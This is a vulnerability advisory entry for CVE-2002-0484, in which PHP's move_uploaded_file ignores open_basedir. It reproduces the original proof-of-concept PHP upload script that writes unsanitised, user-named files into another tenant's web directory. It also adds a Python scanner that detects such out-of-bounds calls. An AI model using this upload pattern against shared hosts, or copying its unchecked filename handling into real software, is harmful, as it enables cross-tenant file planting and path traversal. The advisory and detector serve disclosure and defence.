PHP Move_Uploaded_File Open_Basedir Circumvention Vulnerability

Vulnerability ID: 1106646    Vulnerability type: Access validation error
Published: 2002-03-17    Updated: 2005-05-02
CVE ID: CVE-2002-0484    CNNVD-ID: CNNVD-200208-205
Platform: PHP    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/21347
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-205
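|Vulnerability details
The move_uploaded_file function in PHP does not check the base directory (open_basedir). A remote attacker can exploit this vulnerability to upload files to unintended locations on the system.
|Exploit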
source: http://www.securityfocus.com/bid/4325/info

PHP is a server-side scripting language, designed to be embedded within HTML files. It is available for Windows, Linux, and many Unix-based operating systems. It is commonly used for web development, and is very widely deployed.

It has been reported that the move_uploaded_file function lacks an open_basedir check. The effect of this issue is that this function may be used to perform file operations on directories outside of those specified by the open_basedir setting.

This vulnerability may not be exploited to overwrite existing files. 

<?
// Upload handler from the original report. The destination path below lies
// outside the script's own open_basedir, yet move_uploaded_file() accepts it.

$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file) {
    if ($size < $size_limit) {
        move_uploaded_file($temp, "/domains/somebodyelse.org/public_html/www/test/".$file);
        echo "The file <tt>$file</tt> was successfully uploaded";
    } else {
        echo "Sorry, your file exceeds the size limit of $size_limit bytes";
    }
}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
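
On a shared host where the interpreter cannot be relied on to enforce open_basedir for this function, an operator can approximate the missing check from outside PHP. The following is an added example, not part of the original advisory: it scans PHP source for move_uploaded_file calls whose literal destination falls outside a tenant's open_basedir value. The tenant path /domains/example.org/, the function names and the sample source are assumptions constructed for illustration; only literal absolute destinations are detected and symlinks are not resolved.

```python
import posixpath
import re

# move_uploaded_file(<source expr>, "<literal absolute destination>" ...
CALL_RE = re.compile(
    r"move_uploaded_file\s*\(\s*[^,]+,\s*(['\"])(?P<dest>/[^'\"]*)\1",
    re.IGNORECASE,
)


def allowed_by_basedir(path, open_basedir):
    """True if path lies under one of the colon-separated open_basedir entries.

    Entries are treated as directories (match on a path boundary), and
    '..' segments are collapsed before comparing.
    """
    target = posixpath.normpath(path)
    for entry in filter(None, open_basedir.split(":")):
        base = posixpath.normpath(entry)
        if target == base or target.startswith(base.rstrip("/") + "/"):
            return True
    return False


def audit_source(php_source, open_basedir):
    """Return (line_number, destination) for each call writing outside open_basedir."""
    findings = []
    for match in CALL_RE.finditer(php_source):
        dest = match.group("dest")
        if not allowed_by_basedir(dest, open_basedir):
            line = php_source.count("\n", 0, match.start()) + 1
            findings.append((line, dest))
    return findings


# Constructed sample: the first call mirrors the report, the second stays in bounds.
SAMPLE = '''<?
$temp = $HTTP_POST_FILES['file']['tmp_name'];
move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
move_uploaded_file($temp, "/domains/example.org/uploads/".$file);
?>'''
TENANT_BASEDIR = "/domains/example.org/:/tmp/"  # assumed tenant setting

if __name__ == "__main__":
    for line, dest in audit_source(SAMPLE, TENANT_BASEDIR):
        print(f"line {line}: destination outside open_basedir -> {dest}")
```
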
|References

Source: BUGTRAQ
Name: 20020321 Re: move_uploaded_file breaks safe_mode restrictions in PHP
Link: http://online.securityfocus.com/archive/1/263259
Source: BUGTRAQ
Name: 20020317 move_uploaded_file breaks safe_mode restrictions in PHP
Link: http://online.securityfocus.com/archive/1/262999
Source: bugs.php.net
Link: http://bugs.php.net/bug.php?id=16128
Source: BID
Name: 4325
Link: http://www.securityfocus.com/bid/4325
Source: XF
Name: php-moveuploadedfile-create-files(8591)
Link: http://www.iss.net/security_center/static/8591.php
Source: BUGTRAQ
Name: 20020322 Re: move_uploaded_file breaks safe_mode restrictions in PHP
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=101683938806677&w=2